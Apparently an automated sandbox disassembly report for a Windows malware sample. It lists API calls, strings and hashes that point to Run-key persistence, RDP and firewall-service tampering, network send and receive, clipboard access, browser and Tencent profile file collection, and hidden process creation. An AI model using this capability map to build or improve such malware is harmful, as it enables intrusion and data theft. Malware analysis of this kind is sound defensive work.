                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: FileOpen$FindServiceStatus$ManagerNextQuery$ByteCharMultiNameWidelstrlenwsprintf$CloseCountDiskDisplayDriveEnumErrorFirstFolderFreeGlobalInfoIos_base_dtorLastLocaleMemoryModulePathSettingsSpaceSpecialTickTypeUser_strftimegethostnamelstrcpystd::ios_base::_
                                  • String ID: * $ Gb$ Mb$ | $Error code:$MpsSvc$PRjuRju$QQ : $SOFTWARE\Microsoft\Windows\CurrentVersion\Run$SYSTEM\CurrentControlSet\Control\Terminal Server$SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp$SharedAccess$\Tencent\Users\*.*
                                  • API String ID: 372486894-2842590617
                                  • Opcode ID: eaed5042144f554442736e58f93556f7f2d281011c71e288a8947776c2459ae4
                                  • Instruction ID: ef9dccbb990c63d91164f13d1b0abb2c3a2552d255cc7f59dea9c93b795c0180
                                  • Opcode Fuzzy Hash: eaed5042144f554442736e58f93556f7f2d281011c71e288a8947776c2459ae4
                                  • Instruction Fuzzy Hash: DC13AF74D002989FEB25CB24CC85BDDB7B6EB45301F1081D9E589AB281EBB5ABD4CF50
                                  APIs
                                  • lstrcpy.KERNEL32(?), ref: 1002C3CD
                                  • lstrcat.KERNEL32(?,1007918C), ref: 1002C3DF
                                  • CreateDirectoryA.KERNEL32(?,00000000,?,100628E0,000000FF,?,?,?,1002D5D3), ref: 1002C3E8
                                  • GetLastError.KERNEL32(?,00000000,?,100628E0,000000FF,?,?,?,1002D5D3), ref: 1002C3F2
                                  • FindFirstFileA.KERNEL32(?,?,?,00000000,?,100628E0,000000FF,?,?,?,1002D5D3), ref: 1002C411
                                  • lstrcpy.KERNEL32(?,?), ref: 1002C455
                                  • lstrcat.KERNEL32(?,10078558), ref: 1002C467
                                  • lstrcat.KERNEL32(?,?), ref: 1002C47B
                                  • lstrcpy.KERNEL32(?,?), ref: 1002C4A4
                                  • lstrcat.KERNEL32(?,10078558), ref: 1002C4B6
                                  • lstrcat.KERNEL32(?,?), ref: 1002C4CA
                                  • lstrcmp.KERNEL32(?,100785A8), ref: 1002C4E5
                                  • lstrcmp.KERNEL32(?,100785AC), ref: 1002C4FB
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 1002C50E
                                  • GetLastError.KERNEL32 ref: 1002C518
                                  • CopyFileA.KERNEL32(?,?,00000000), ref: 1002C54F
                                  • _strstr.LIBCMT ref: 1002C569
                                  • _strstr.LIBCMT ref: 1002C581
                                    • Part of subcall function 1001C910: __CxxThrowException@8.LIBVCRUNTIME ref: 1001C93D
                                    • Part of subcall function 1001C910: __CxxThrowException@8.LIBVCRUNTIME ref: 1001C97C
                                    • Part of subcall function 1001C910: ___std_exception_copy.LIBVCRUNTIME ref: 1001C9AF
                                  • CreateFileA.KERNEL32(100791A4,80000000,00000003,00000000,00000003,00000000,00000000,Function_00029180,00000000,00000000,00000000,?), ref: 1002C7C2
                                  • CreatePipe.KERNEL32(?,?,?,00000000), ref: 1002C859
                                  • CreateProcessA.KERNEL32(?,?,00000000,?,00000000,00000000,00000001,08000000,00000000,00000000,?), ref: 1002C8F1
                                  • _strstr.LIBCMT ref: 1002CAD6
                                  • _strstr.LIBCMT ref: 1002CAFD
                                  • __alldvrm.LIBCMT ref: 1002CBE7
                                  • SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000,00000001,?,?,?,00000000), ref: 1002CC57
                                  • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,00000000,00000001), ref: 1002CC6E
                                  • CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000,?,00000000,00000000,00000001,08000000,00000000,00000000,?), ref: 1002CDE5
                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,08000000,00000000,00000000,?,?), ref: 1002CE59
                                  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 1002CE81
                                  • ReadFile.KERNEL32(?,?,00001000,?,00000000,?,00000000,?), ref: 1002CF19
                                  • _strstr.LIBCMT ref: 1002CFC6
                                  • _strstr.LIBCMT ref: 1002CFE6
                                  • __alldvrm.LIBCMT ref: 1002D0D4
                                  • SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000,00000001), ref: 1002D144
                                  • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,00000000,00000001), ref: 1002D15B
                                  • FindNextFileA.KERNEL32(?,00000010), ref: 1002D2BD
                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 1002D3B7
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: File$Create$_strstr$lstrcat$Read$lstrcpy$DirectoryErrorException@8FindLastPipePointerProcessThrow__alldvrmlstrcmp$CopyFirstIos_base_dtorNext___std_exception_copystd::ios_base::_
                                  • String ID:
                                  • API String ID: 785693070-0
                                  • Opcode ID: 0e5beaab013e4b02d41b13fb7c9da6e0ff511a7466300b9bcb2e29bad7722ea0
                                  • Instruction ID: c6aac867a3ae8722f7bed68f6ea5494810b815fd492b74a42de3eb4e70333ae2
                                  • Opcode Fuzzy Hash: 0e5beaab013e4b02d41b13fb7c9da6e0ff511a7466300b9bcb2e29bad7722ea0
                                  • Instruction Fuzzy Hash: 77A2CD71D002699FEB21CB60DC98FDAB7B9EF44345F5041E9E809A7281EB71AE85CF50
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 1002D75B
                                  • lstrcpy.KERNEL32(?,?), ref: 1002D799
                                  • CreateFileA.KERNEL32(?,00000001,00000003,00000000,00000003,00000080,00000000), ref: 1002D7C3
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 1002D7D7
                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 1002D7F9
                                  • _strstr.LIBCMT ref: 1002D809
                                  • _strstr.LIBCMT ref: 1002D828
                                  • _strstr.LIBCMT ref: 1002D840
                                  • lstrcpy.KERNEL32(?,?), ref: 1002D883
                                  • lstrcpy.KERNEL32(?,?), ref: 1002D8AF
                                  • lstrcpy.KERNEL32(?,10079264), ref: 1002D8F5
                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 1002D9C6
                                  • CloseHandle.KERNEL32(00000000), ref: 1002D9CD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: lstrcpy$File_strstr$Create$CloseFolderHandlePathProcessReadSize
                                  • String ID: 1$D$firefox.exe
                                  • API String ID: 4099344064-3475012443
                                  • Opcode ID: 1dc5e8989785b4bda7ccfddf2bba8779ed50f560ced8dadd8f45b7337581cef6
                                  • Instruction ID: 21b72cd11bd9bf49f1dd58248626e67e70ffaeac0b62a91f251ab15fe1912ece
                                  • Opcode Fuzzy Hash: 1dc5e8989785b4bda7ccfddf2bba8779ed50f560ced8dadd8f45b7337581cef6
                                  • Instruction Fuzzy Hash: 6C7164B2D0072D6ADB21D7A0DC45FDA77BCEB49705F440196F608E6081EBB4AB84CFA4
                                  APIs
                                  • send.WS2_32(?,?,?,00000000), ref: 100224DB
                                  • GetLastError.KERNEL32 ref: 1002250B
                                  • RtlEnterCriticalSection.NTDLL(?), ref: 10022539
                                  • shutdown.WS2_32(?,00000002), ref: 1002254E
                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 10022555
                                  • lstrcpy.KERNEL32(?,?), ref: 100225B6
                                  • lstrlen.KERNEL32(?), ref: 100225C3
                                  • gethostbyname.WS2_32(?), ref: 100225DB
                                  • GetLastError.KERNEL32 ref: 100225E5
                                  • CreateThread.KERNEL32(00000000,00000000,100226D0,?,00000000,00000000), ref: 1002264F
                                  • socket.WS2_32(00000002,00000001,00000006), ref: 1002274A
                                  • GetLastError.KERNEL32 ref: 10022760
                                  • connect.WS2_32(?,?,00000010), ref: 100227CF
                                  • getsockname.WS2_32(?,?,?), ref: 10022804
                                  • select.WS2_32(00000000,?,00000000,00000000,?), ref: 10022917
                                  • recv.WS2_32(?,?,00004FFB,00000000), ref: 10022941
                                  • GetLastError.KERNEL32 ref: 1002297B
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: ErrorLast$CriticalSection$CreateEnterLeaveThreadconnectgethostbynamegetsocknamelstrcpylstrlenrecvselectsendshutdownsocket
                                  • String ID:
                                  • API String ID: 1762070719-0
                                  • Opcode ID: f12f43f355e2913f1fb6564092dbc3e05adfa8f446e04b4b636a7539f2386c4d
                                  • Instruction ID: 530412d358ef13cd30eb6eff3d6d5f725b22ec64da2f134dd1707c756a858e9a
                                  • Opcode Fuzzy Hash: f12f43f355e2913f1fb6564092dbc3e05adfa8f446e04b4b636a7539f2386c4d
                                  • Instruction Fuzzy Hash: 53F1A175A00629AFDB20CFA4DC85BDEB7B5EF49311F4041DAE609AB281D7709E84CF90
                                  APIs
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 10028456
                                  • FindClose.KERNEL32(00000000), ref: 1002858C
                                  • RemoveDirectoryA.KERNEL32(?), ref: 10028598
                                  • Sleep.KERNEL32(00000001,?,?), ref: 1002860B
                                  • CreateFileA.KERNEL32(1008C3A0,80000000,00000001,00000000,00000003,00000080,00000000,?,?), ref: 10028628
                                  • GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 1002863D
                                  • CreateFileA.KERNEL32(1008C3A0,80000000,00000001,00000000,00000003,00000080,00000000,?,?), ref: 1002866C
                                  • GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 10028683
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 100286B2
                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 100286E1
                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 10028756
                                  • LocalFree.KERNEL32(00000000,00000000,00000001), ref: 1002877D
                                  • CloseHandle.KERNEL32(00000000,?,?), ref: 10028793
                                  • Sleep.KERNEL32(000001F4,?,?), ref: 1002879E
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: File$CloseCreateFindLocalSizeSleep$AllocDirectoryFirstFreeHandlePointerReadRemove
                                  • String ID:
                                  • API String ID: 2870245554-0
                                  • Opcode ID: 5c02852aca5b1ad305ddcb12ea57ff70cade89943826154d1dce3a01b81c7d6d
                                  • Instruction ID: 9abde7887f01a9e4308f1e1e6579fd59006c6bdb325a6c287ec11336e428b0a8
                                  • Opcode Fuzzy Hash: 5c02852aca5b1ad305ddcb12ea57ff70cade89943826154d1dce3a01b81c7d6d
                                  • Instruction Fuzzy Hash: C8C16635D012149FEB11CB74DC89BEEBBB6EF46304F904258F906A7192EB74AB84C760
                                  APIs
                                  • lstrcpy.KERNEL32(?,?), ref: 10023188
                                  • FindFirstFileA.KERNEL32(?,?), ref: 100231DC
                                  • lstrcpy.KERNEL32(?,?), ref: 1002320C
                                  • _strstr.LIBCMT ref: 10023370
                                  • LocalAlloc.KERNEL32(00000040,00000400), ref: 10023387
                                  • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 100233F5
                                  • LocalSize.KERNEL32(00000000), ref: 100233FE
                                  • Sleep.KERNEL32(0000000A,00000000,00000000), ref: 1002340F
                                  • LocalFree.KERNEL32(00000000), ref: 10023416
                                  • FindNextFileA.KERNEL32(?,00000010), ref: 1002342E
                                  • FindClose.KERNEL32(?), ref: 10023449
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: Local$Find$AllocFilelstrcpy$CloseFirstFreeNextSizeSleep_strstr
                                  • String ID: \
                                  • API String ID: 2400463266-2967466578
                                  • Opcode ID: c75ebdeda7fae14cea93437a2d9b9780273bf63878692337f621c6d7cb7d4005
                                  • Instruction ID: a9bc2ec9a5e4d5509740a9c8aa022550c3b9fc9fb83989263553e61ed903fb2f
                                  • Opcode Fuzzy Hash: c75ebdeda7fae14cea93437a2d9b9780273bf63878692337f621c6d7cb7d4005
                                  • Instruction Fuzzy Hash: 09A1F6754083869FC711CF20DC95B9B7BEAEF46344F858859E9C587241EB33EA09C762
                                  APIs
                                  • OpenClipboard.USER32 ref: 1002C01E
                                  • EmptyClipboard.USER32 ref: 1002C02C
                                  • GlobalAlloc.KERNEL32(00002000,?), ref: 1002C03C
                                  • GlobalFix.KERNEL32(00000000), ref: 1002C048
                                  • GlobalUnWire.KERNEL32(00000000), ref: 1002C05E
                                  • SetClipboardData.USER32(00000001,00000000), ref: 1002C067
                                  • CloseClipboard.USER32 ref: 1002C06D
                                  • OpenClipboard.USER32(00000000), ref: 1002C084
                                  • GetClipboardData.USER32(00000001), ref: 1002C094
                                  • GlobalFix.KERNEL32(00000000), ref: 1002C09B
                                  • CloseClipboard.USER32 ref: 1002C15F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: Clipboard$Global$CloseDataOpen$AllocEmptyWire
                                  • String ID: NULL
                                  • API String ID: 1263324636-324932091
                                  • Opcode ID: 0d61714ba7b5f0c40e36a24a6666119437ac47073f95aa2b9919093933bbc768
                                  • Instruction ID: 400162aeeb1ea5b9ca1cf531f64844b92407e51fb74a7b43c8ec825263358158
                                  • Opcode Fuzzy Hash: 0d61714ba7b5f0c40e36a24a6666119437ac47073f95aa2b9919093933bbc768
                                  • Instruction Fuzzy Hash: 3D413A3A404256AFD711CFB4DC89EAABFBAEF472407068199ED85DB202DE31E505C7E1
                                  APIs
                                  • lstrlen.KERNEL32(?), ref: 10024520
                                  • wsprintfA.USER32 ref: 1002454C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 10024563
                                  • wsprintfA.USER32 ref: 100245AB
                                  • wsprintfA.USER32 ref: 100245CE
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 100246AC
                                  • FindClose.KERNEL32(?), ref: 100246C7
                                    • Part of subcall function 10037ACA: std::invalid_argument::invalid_argument.LIBCONCRT ref: 10037AD6
                                    • Part of subcall function 10037ACA: __CxxThrowException@8.LIBVCRUNTIME ref: 10037AE4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: Findwsprintf$File$CloseException@8FirstNextThrowlstrlenstd::invalid_argument::invalid_argument
                                  • String ID: .
                                  • API String ID: 648996880-248832578
                                  • Opcode ID: c59b87833085ea7394338ed07c7c7e93f14cb1358d830d3aa1380a1bc0eb6459
                                  • Instruction ID: a81bd424a75b6edb125dd219aae49f712d71b39fc0785eabed3f65e50fb2d0b0
                                  • Opcode Fuzzy Hash: c59b87833085ea7394338ed07c7c7e93f14cb1358d830d3aa1380a1bc0eb6459
                                  • Instruction Fuzzy Hash: 8A51C3B1900228AFDB25CF64DC88BDEB7B9EF09300F4145D9E609A7241DF34AB848F65
                                  APIs
                                  • FindFirstFileA.KERNEL32(?,?), ref: 1002477A
                                  • FindClose.KERNEL32(00000000), ref: 100247EE
                                  • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 10024809
                                  • Sleep.KERNEL32(000001F4), ref: 10024839
                                  • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 1002485A
                                  • CloseHandle.KERNEL32(00000000), ref: 10024866
                                  • GetLastError.KERNEL32 ref: 100248A3
                                  • wsprintfA.USER32 ref: 100248BA
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: File$CloseCreateFind$ErrorFirstHandleLastSleepwsprintf
                                  • String ID:
                                  • API String ID: 1612440928-0
                                  • Opcode ID: cabf3bdbed042bf51ebf373f31938e7904f6aa94265057035e2e7ef716c5db20
                                  • Instruction ID: 95f9f6e4f95b3b344b267a2b4f5f7afd8c5787e944251514b1b3a7f9b94cb743
                                  • Opcode Fuzzy Hash: cabf3bdbed042bf51ebf373f31938e7904f6aa94265057035e2e7ef716c5db20
                                  • Instruction Fuzzy Hash: 3F516775904759ABE720CF64EC85FDAB7BDEB0A301F4202A5FA1997181DF70AE848F50
                                  APIs
                                  • lstrcpy.KERNEL32(?), ref: 1002C1B4
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 1002C1D1
                                  • FindFirstFileA.KERNEL32(?,?,?,00000000), ref: 1002C1FC
                                  • lstrcpy.KERNEL32(?,?), ref: 1002C243
                                  • lstrcpy.KERNEL32(?,?), ref: 1002C28A
                                  • CreateDirectoryA.KERNEL32(?,00000000,?,?,?,?,00000000), ref: 1002C2E4
                                  • CopyFileA.KERNEL32(?,?,00000000), ref: 1002C31A
                                  • FindNextFileA.KERNEL32(?,00000010,?,?,?,?,00000000), ref: 1002C32D
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: Filelstrcpy$CreateDirectoryFind$CopyFirstNext
                                  • String ID:
                                  • API String ID: 835149165-0
                                  • Opcode ID: e93e67be7cef07d6650ea99c290638fb7a92c95ef7197641ddea0c58a8016949
                                  • Instruction ID: 494b491f79b9f7d22e9fa64d10fb8d7a3fe34fa55ed2fd2c2ee68dea3d663ada
                                  • Opcode Fuzzy Hash: e93e67be7cef07d6650ea99c290638fb7a92c95ef7197641ddea0c58a8016949
                                  • Instruction Fuzzy Hash: 93414EB1D0022DAADB10DBA0DC85FDA77BDEB08704F8109D6E709E2051EB749B88CF95
                                  APIs
                                  • lstrcpy.KERNEL32(?,?), ref: 10023188
                                  • FindFirstFileA.KERNEL32(?,?), ref: 100231DC
                                  • lstrcpy.KERNEL32(?,?), ref: 1002320C
                                  • FindNextFileA.KERNEL32(?,00000010), ref: 1002342E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: FileFindlstrcpy$FirstNext
                                  • String ID: \
                                  • API String ID: 2764145207-2967466578
                                  • Opcode ID: 58b80f01ab7c2801b00470d679980a0ebd7ea3bec0e140ae251f181d84d78490
                                  • Instruction ID: 70e9d521bbe3c211fdc09d11bca489ecf1c7166b67d648f911c2adb956e0c797
                                  • Opcode Fuzzy Hash: 58b80f01ab7c2801b00470d679980a0ebd7ea3bec0e140ae251f181d84d78490
                                  • Instruction Fuzzy Hash: 8F61D47140838A9FC711CF60EC95BDB7BEAEF4A344F448899E9C48B152D736A90DCB52
                                  APIs
                                    • Part of subcall function 1004E0DC: GetLastError.KERNEL32(?,?,?,1003ED3E,?,?,?,?,1003EE09,?,?,10085840), ref: 1004E0E1
                                    • Part of subcall function 1004E0DC: SetLastError.KERNEL32(00000000,100811E4,000000FF,?,1003EE09,?,?,10085840), ref: 1004E17F
                                  • GetACP.KERNEL32(00000055,?,?,?,?,?,1004F52B,?,?,?,?,?,?,00000005), ref: 1005B6DE
                                  • IsValidCodePage.KERNEL32(00000000,00000055,?,?,?,?,?,1004F52B,?,?,?,?,?,?,00000005), ref: 1005B709
                                  • _wcschr.LIBVCRUNTIME ref: 1005B79D
                                  • _wcschr.LIBVCRUNTIME ref: 1005B7AB
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,1004F52B,00000000,1004F64B), ref: 1005B86E
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                  • String ID:
                                  • API String ID: 4147378913-0
                                  • Opcode ID: e2e83e29fddc58e32a926a91443d95557941a7bc456b83e047a3e7626ea2dd0d
                                  • Instruction ID: f4100ba16a994014ef307abb055ab7ad8399c76de4691ded939d6f181299281c
                                  • Opcode Fuzzy Hash: e2e83e29fddc58e32a926a91443d95557941a7bc456b83e047a3e7626ea2dd0d
                                  • Instruction Fuzzy Hash: 7A71E675A00A06AAE714EB65CC86BAB73ECEF48790F114439F905DB181EB74FD48CB64
                                  APIs
                                    • Part of subcall function 10020650: LoadLibraryW.KERNEL32(100782C8), ref: 1002066B
                                    • Part of subcall function 10020650: LoadLibraryW.KERNEL32(10077444), ref: 1002069E
                                    • Part of subcall function 10020650: GetProcAddress.KERNEL32(00000000,10077470), ref: 100206AC
                                  • ExitWindowsEx.USER32(?,00000000), ref: 100181E7
                                    • Part of subcall function 10020650: LoadLibraryW.KERNEL32(100784DC), ref: 1002070B
                                    • Part of subcall function 10020650: GetProcAddress.KERNEL32(00000000,100784F8), ref: 10020717
                                    • Part of subcall function 10020650: CloseHandle.KERNEL32(?), ref: 10020731
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: LibraryLoad$AddressProc$CloseExitHandleWindows
                                  • String ID:
                                  • API String ID: 2392996298-0
                                  • Opcode ID: 3ea7901086e65344f11d79aca33693397c5ccc75f64198f2e58b2052378a8d7d
                                  • Instruction ID: 402620fa5a1966597bdddeaff15d5e0306a82cf1ef27bf28a06f217d553292bd
                                  • Opcode Fuzzy Hash: 3ea7901086e65344f11d79aca33693397c5ccc75f64198f2e58b2052378a8d7d
                                  • Instruction Fuzzy Hash: 59D0223152032412F220A7782C4BB96328FCB85220F804363BC14762C2ACE6F92001DD
                                  APIs
                                  • OpenSCManagerA.ADVAPI32(00000000,00000000), ref: 1002A519
                                  • OpenServiceA.ADVAPI32(?,?,000F01FF,1002A201,00000001), ref: 1002A5FD
                                  • QueryServiceConfig2A.ADVAPI32(00000000,00000001,?,?,?), ref: 1002A628
                                  • QueryServiceConfigA.ADVAPI32(?,?,00002000,00002000), ref: 1002A6EE
                                  • LocalSize.KERNEL32(00000000), ref: 1002A768
                                  • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 1002A782
                                  • lstrlen.KERNEL32(?), ref: 1002A793
                                  • lstrlen.KERNEL32(?), ref: 1002A7B2
                                  • lstrlen.KERNEL32(?), ref: 1002A7C8
                                  • lstrlen.KERNEL32(?), ref: 1002A7EF
                                  • lstrlen.KERNEL32(?), ref: 1002A7FC
                                  • lstrlen.KERNEL32(?), ref: 1002A81D
                                  • lstrlen.KERNEL32(?), ref: 1002A82D
                                  • lstrlen.KERNEL32(?), ref: 1002A854
                                  • lstrlen.KERNEL32(?), ref: 1002A863
                                  • lstrlen.KERNEL32(?), ref: 1002A888
                                  • lstrlen.KERNEL32(?), ref: 1002A897
                                  • lstrlen.KERNEL32(?), ref: 1002A8BC
                                  • lstrlen.KERNEL32(?), ref: 1002A8C7
                                  • lstrlen.KERNEL32(?), ref: 1002A8E4
                                  • lstrlen.KERNEL32(?), ref: 1002A8F3
                                  • lstrlen.KERNEL32(?), ref: 1002A918
                                  • CloseServiceHandle.ADVAPI32(?), ref: 1002A92D
                                  • CloseServiceHandle.ADVAPI32(?), ref: 1002A95B
                                  • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 1002A96A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: lstrlen$Service$Local$AllocCloseHandleOpenQuery$ConfigConfig2ManagerSize
                                  • String ID: PRjuRju
                                  • API String ID: 3080365727-3013187748
                                  • Opcode ID: c9726cd17e42162a066cdef089aac86d3290cc942457c7e2b3b39a06ce998c58
                                  • Instruction ID: a3be7a127e673c228dd4925915da1cfea05ce204894ee203c66c57baf8a49576
                                  • Opcode Fuzzy Hash: c9726cd17e42162a066cdef089aac86d3290cc942457c7e2b3b39a06ce998c58
                                  • Instruction Fuzzy Hash: 08C14C71D0022AAFEB61DB90CC89F9A7BBAFF04305F058091F689E6151DF759A98CF14
                                  APIs
                                  • LocalAlloc.KERNEL32(00000040,00000400), ref: 1002A223
                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 1002A261
                                  • OpenServiceA.ADVAPI32(00000000,00000002,000F01FF), ref: 1002A271
                                  • GetLastError.KERNEL32 ref: 1002A27C
                                  • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1002A287
                                  • ControlService.ADVAPI32(00000000,00000001,?), ref: 1002A29A
                                  • DeleteService.ADVAPI32(00000000), ref: 1002A2A1
                                  • CloseServiceHandle.ADVAPI32(?), ref: 1002A2AC
                                  • CloseServiceHandle.ADVAPI32(?), ref: 1002A2B5
                                  • Sleep.KERNEL32(00000064), ref: 1002A2BD
                                  • lstrlen.KERNEL32(00000002), ref: 1002A2C8
                                  • LocalSize.KERNEL32(00000000), ref: 1002A2D5
                                  • lstrlen.KERNEL32(00000002,00000042), ref: 1002A2E2
                                  • LocalReAlloc.KERNEL32(00000000,00000000), ref: 1002A2EF
                                  • lstrlen.KERNEL32(00000002), ref: 1002A2FD
                                  • lstrlen.KERNEL32(00000002), ref: 1002A312
                                  • lstrlen.KERNEL32(00000002), ref: 1002A322
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: Service$lstrlen$Local$AllocCloseHandleOpen$ControlDeleteErrorLastManagerQuerySizeSleepStatus
                                  • String ID: PRjuRju
                                  • API String ID: 1710395047-3013187748
                                  • Opcode ID: 4e6195b95e974620fd8713000a2058a358cea4ec90548153cb576802796274a0
                                  • Instruction ID: 5f53909c66c5487652677595c079e137474335fa5a09c8ece76edee9df9807ae
                                  • Opcode Fuzzy Hash: 4e6195b95e974620fd8713000a2058a358cea4ec90548153cb576802796274a0
                                  • Instruction Fuzzy Hash: ED619475D04228AFDB01DFA4DC85BAFB7FAEF4D311F41405AF906AB241CE756A448BA0
                                  APIs
                                    • Part of subcall function 1005E8D4: _free.LIBCMT ref: 1005E8F6
                                  • _free.LIBCMT ref: 10057270
                                  • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10057333
                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 10057340
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10057355
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10057360
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1005736B
                                  • __dosmaperr.LIBCMT ref: 10057372
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1005737D
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10057388
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1005739A
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 100573A5
                                  • _free.LIBCMT ref: 10057265
                                    • Part of subcall function 1004D9B2: HeapFree.KERNEL32(00000000,00000000,?,1005AA7F,10053BE7,00000000,10053BE7,?,?,1005AD24,10053BE7,00000007,10053BE7,?,10058D36,10053BE7), ref: 1004D9C8
